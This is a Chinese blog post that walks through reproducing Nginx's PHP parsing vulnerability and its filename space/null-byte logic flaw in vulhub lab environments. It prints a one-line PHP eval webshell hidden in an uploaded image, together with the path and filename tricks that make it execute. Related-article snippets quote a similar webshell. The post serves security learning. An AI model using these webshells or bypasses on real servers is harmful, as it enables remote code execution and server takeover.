Nginx解析与文件逻辑漏洞浮现利用

已于 2024-03-06 11:35:26 修改
阅读量479 收藏 9
点赞数 17
文章标签: 安全 web安全
于 2024-03-01 20:16:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/prohet/article/details/136404785
版权

环境均搭建的vulhub

 

复现工具

burpsuite抓包修改

hackbar插件

带有后门代码的图片,下图区域即为所用后门代码

<?php eval($_REQUEST{'pass'}); ?>

 

复现过程

解析漏洞

f889bf68a52d41eb897f247fe696ff75.png 

如图为搭建环境网页

直接上传我们的后门图片

67874af35c844b69b08690cc38ad2c48.jpg

 

上传图片后访问图片路径,之后就开始利用解析漏洞,具体原理就是在访问路径后加上/xxx.php,这里的xxx可以是任何内容只要有.php即可,由于中间件配置不当,这里会将图片当成php执行,如下图所示 

816bcf24c1814cd58be7d00f4b9fcde8.jpg发现有提示pass,说明复现成功,直接开整

 

 f8836f7e3c1f4db7b0d2e16f50896432.jpg9c1b215d7cf7405aa84a8c37719127da.jpg

 

 

 

 

文件逻辑漏洞

打开搭建环境

7f5afbab9a6245609bd26261f3e45581.jpg 

 

还是上传后门图片,抓包修改一下这里需要,具体就是在文件名后加上一个空格 

5623bb794b2e470d904d131db0bfd3e7.png

 之后我们访问一下图片路径发现没有此文件,说明第一步完成

387a9c24463240e58d25bb404d220d8f.jpg

 

直接抓包重新访问,在文件名后加上(0x20)(0x00).php

37369794f2e44fdfbf7bc8805ff77219.jpg

 

 

复现易错点

1.在解析漏洞环境,后门代码必须是REQUEST,其他的不行

2.在文件逻辑漏洞,修改值得用burp的hex页面进行修改,不能直接在页面直接输入进行访问

 

prohet
关注
  • 17
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
phpstudy nginx解析漏洞分析
惠惠软件
06-30 764
可见 这里的正则处理,将文件传递给fastcgi处理,$fastcgi_script_name会被设置为1.png/.php,然后构造成SCRIPT_FILENAME传递给PHP CGI。如果PHP中开启了fix_pathinfo这个选项,PHP会认为SCRIPT_FILENAME是1.png,而.php是PATH_INFO,所以就会将1.jpg作为PHP文件解析了。这是我的生产环境,根据漏洞特性,大概率就是fastcgi的问题。查看该站点相关的nginx的配置文件。成功执行phpinfo();
nginx漏洞
scu_hacker博客
01-18 6353
目录 一、目录遍历漏洞 二、CRLF注入漏洞 2.1 影响范围 2.2 漏洞详情 三、目录穿越漏洞 3.1 漏洞详情 一、目录遍历漏洞 原因:配置不当。 若将/usr/local/nginx/conf/nginx.conf里的autoindex off改为autoindex on,那么就可以直接访问到网站根目录下的所有文件, 然后在网站根目录下新建test文件夹,直接访问,可以访问到test文件 二、CRLF注入漏洞 2.1 影响范围 nginx + php5.2.
nginx 漏洞
亿光年
05-27 1714
      最近忙,很久都没来写博客了,nginx文件类型漏洞,我是直接受害者,5月20号提出的,我24号直到受害才知道。对这方面的关注与敏感度不够!大家可能对这个漏洞都是很熟悉了的。但我还是详细的说明一下的。nginx默认以cgi的方式支持php的运行,譬如在配置文件当中可以以location ~ /.php$ {root html;fastcgi_pass 127.0.0.1:900
Nginx漏洞解析及复现
最新发布
A526847的博客
06-05 2547
开启这一选项有什么用呢?看名字就知道是对文件路径进行“修理”。举个例子,当php遇到 文件路径“/aaa.xxx/bbb.yyy/ccc.zzz”时,若“/aaa.xxx/bbb.yyy/ccc.zzz”不存在,则会去掉最后的 “/ccc.zzz”,然后判断“/aaa.xxx/bbb.yyy”是否存在,若存在,则把“/aaa.xxx/bbb.yyy”当做文件 “/aaa.xxx/bbb.yyy/ccc.zzz”,若“/aaa.xxx/bbb.yyy”仍不存在,则继续去掉“/bbb.yyy”,以此类推。
Nginx漏洞
weixin_64623293的博客
08-20 528
首先有Nginx环境。
Nginx解析漏洞
qq_43665434的博客
05-20 486
Nginx解析漏洞 漏洞原理:传送门 实验环境 主机 角色 IP centos8 漏洞靶机 192.168.1.80 windows10 攻击机 192.168.1.120 实验流程 开启漏洞环境centos8 service docker start cd /usr/sbin/vulhub/nginx/nginx_parsing_vulnerability/ docker-compose build docker-compose up -d cat docker-compose
Nginx 解析漏洞
weixin_45715461的博客
05-30 502
Nginx 解析漏洞
Nginx文件解析漏洞
xdjxi的博客
02-23 1772
1 首先拉取一个基础镜像 docker pull ubuntu:14.04.5 2.启动一个容器 使用docker run -d -it -p本机端口:80 ubuntu:14.04.5启动镜像 3.进入容器 使用docker exec -it [容器ID]/bin/bash进入容器 4 .更换apt源 然后使用以下语句安装相关环境: apt-get update # 更新源 apt-get install vim # 安装vim apt-get install nginx #..
文件解析漏洞总结-Nginx
热门推荐
若水斋
08-18 3万+
与Apache相比,Nginx算是后起之秀,但大有赶超之势。百度一番,又谷歌一番,最终只找到了三个已公开的、关于Nginx解析漏洞,记录如下
Nginx 解析漏洞复现及利用
Tauil的博客
07-20 7695
Nginx解析漏洞解析漏洞是PHPCGI的漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认开启,当URL中有不存在的文件,PHP就会向前递归解析在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg解析为php文件。来上传我们的文件,很显然,不给上传,东西写进去文件被破坏了,被检验出不是正常的jpg不能上传了,可能有些朋友就成功了,因为第一次的时候我是可以的,现在应该是写的内容太多了,出了问题。phpeval($_POST["cmd"]);...
第八天Apache解析漏洞IIS 解析漏洞Nginx 解析漏洞文件上传%oo截断
代码审计
03-11 4755
这里写目录标题一级目录二级目录三级目录 一级目录 二级目录 三级目录 文件名后缀就一个%00字节,可以截断某些函数对文件名的判断。在许多语言函数中,处理字符串的函数中0x00被认为是终止符。 例如: 网站上传函数处理xxx.php%00.jpg时,首先后缀名是合法的jpg格式,可以上传,在保存文件时,遇到%00字符丢弃后面的jpg,文件后缀最终保存的后缀名为xxx.php ...
nginx1.4.0漏洞验证
06-21
测试用到的python文件和linux版本的nginx1.4.0源码
Nginx解析漏洞测试
09-19
Nginx是一款高性能的web服务器,使用非常广泛,其不仅经常被用作反向代理,也可以非常好的支持PHP的运行。默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析,这将导致严重的安全问题,使得恶意的攻击者可能攻陷支持php的nginx服务器。
利用 Nginx 畸形解析漏洞 getshell
weixin_45253622的博客
12-09 3630
Nginx Nginx 是一款轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like 协议下发行。其特点是占有内存少,并发能力强,事实上nginx的并发能力确实在同类型的网页服务器中表现较好。 漏洞描述: 对于任意文件名,在后面添加/xxx.php(xxx为任意字符)后,即可将文件作为php解析。 例:info.jpg后面加上/xxx.php,会将info.jpg 以php解析漏洞原理: 查看 nginx 配置文件: cd /home/ch1/Desktop
CVE-2013-4547 Nginx 文件逻辑漏洞
weixin_45715461的博客
05-30 894
CVE-2013-4547 Nginx 文件逻辑漏洞
Nginx漏洞总结
m0_67391518的博客
08-02 7034
Nginx(enginex)是一个高性能的HTTP和反向代理web服务器,同时也提供了IMAP/POP3/SMTP服务。其将源代码以类BSD许可证的形式发布,因它的稳定性、丰富的功能集、简单的配置文件和低系统资源的消耗而闻名。2011年6月1日,nginx1.0.4发布。Nginx是一款轻量级的Web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like协议下发行。...
nginx常见漏洞解析_nginx漏洞
2401_83947255的博客
04-12 1189
0×1HTTP返回包头:就是httpresponsHTTP返回包体:就是请求的具体文件,例如出来个网页资源,网页内嵌套的内容等等。自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
深入解析Nginx配置文件及其应用
本文将深入解析Nginx配置文件的各个组成部分及其作用,帮助读者更好地理解和管理这个强大的Web服务器。首先,Nginx配置文件主要分为四个层次结构:main、http、upstream和server。每个部分都有其特定的功能。 1. **...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值